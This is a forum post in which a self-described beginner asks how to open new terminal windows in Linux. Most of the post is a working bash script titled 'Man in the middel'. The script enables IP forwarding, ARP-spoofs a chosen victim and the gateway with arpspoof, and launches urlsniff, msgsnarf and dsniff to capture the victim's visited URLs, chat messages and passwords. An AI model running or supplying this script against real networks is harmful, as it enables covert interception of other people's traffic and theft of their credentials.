Jump to content

New Windows In Linux?


rufus777

Recommended Posts

Hay! :)

I do not have a code for New Windows Shell? can anyone help me?

I've tried gnome-terminal, but it does not work so well ...

hehe, I realize that I'm noob but but ..... :P

echo "Man in the middel"

echo " SNARF "

echo " by "

echo " Rufus777 "

echo -n "Wi-fi: "

read -e WIFI

echo -n "Gateway IP: "

read -e ROUTER

echo -n "Target IP: "

read -e VICTIM

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i $WIFI -t $VICTIM $ROUTER &

arpspoof -i $WIFI -t $ROUTER $VICTIM &

gnome-terminal -x urlsniff -i wlan0 &

gnome-terminal -x msgsnarf -i wlan0 &

gnome-terminal -x dsniff -i wlan0 &

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...